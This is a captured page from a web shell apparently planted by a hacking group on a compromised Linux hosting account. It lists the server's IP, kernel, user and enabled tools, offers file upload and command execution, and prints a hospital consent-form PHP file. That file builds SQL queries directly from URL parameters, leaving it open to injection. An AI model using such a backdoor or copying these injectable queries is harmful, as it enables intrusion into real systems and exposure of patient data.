Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.145.7.208
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/showGeneralConsent.php
     <?php
     session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='60629'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		   	include 'dashboarddocument.php';
}
?>
	  

  <?php

include 'fileheader.php';
?>



<h3 align='center'>Genaral Consent</h3>
<?php
include("dbconnection.php");
	$sqlpatient = "SELECT * FROM save_activity WHERE  prescriptionid='$_GET[prescriptionid]'";
	$qsqlpatient = mysqli_query($con,$sqlpatient);
	if($rsp = mysqli_fetch_array($qsqlpatient))
	{
	    if($rsp[discription]== 'Intial Assessment<br>Covid 19 Checklist<br>Doc.no-'){
	        echo"<h4>Doc.no : $rsp[srno]</h4>";

} else{
    echo "";
}
       
	}
?>  

<table id='example2' class='table table-bordered table-hover'>
<tr>
  <td> 
        I here by give consent authorization to being examined in the OPD by the doctors appointed in the OPD.I understand the Doctor will be assisted by other health care professionals & such others he/she feels necessary. I agree with their participation in my care. </td>
</tr>


<tr>
    <td>I gave consent to carry out necessary tests or investigations and I am willing to pay all the charges for the treatment. I am fully aware that treatment is being performed in good faith & that no guarantee or assurance has been given for the results to be obtained.I am responsible for my personal belongings and I do not hold doctors/staff hospital responsible in case of any loss of personal belongings.</td>
</tr>



<tr>
    <td>I am aware that photography/ videography/ Audio recording in hospital premises is strictly prohibited.</td>
</tr>

<tr>
    <td>I am aware that smoking and consumption of alcohol  is strictly prohibited.</td>
</tr>

<tr>
    <td>I have read this consent and/or it has been read over to me and explained to me in the language that I understand.</td>
</tr>

<tr>
    <td>To attest my consent I hereby affix my signature/left hand thumb Impression voluntarily.

        
    </td>
</tr>
<tr>
    <td><br><br><br><br><br><br><br><br>
        Signature/Thumb Impression of Patient/ Relative 
    </td>
</tr>

</table>


<?php
  	$sql ="SELECT * FROM GeneralConsent WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
	    $sql1 ="SELECT * FROM site_users WHERE userno='$rs[entered_by]'";
		$qsql1 = mysqli_query($con,$sql1);
		if($rs1 = mysqli_fetch_array($qsql1))
		{
		    
		 echo"<h5><b> Created & Updated </b><h5>
		 <table id='example2' class='table table-bordered table-hover'>
		 <tr><td width=50%><b>By :</b>$rs1[name] </b><td width='50%'><b>At :</b> $rs[created_at] </tr>";   
		    
		}
		}
		?>
		</table>
</div>

Anon7 - 2022
AnonSec Team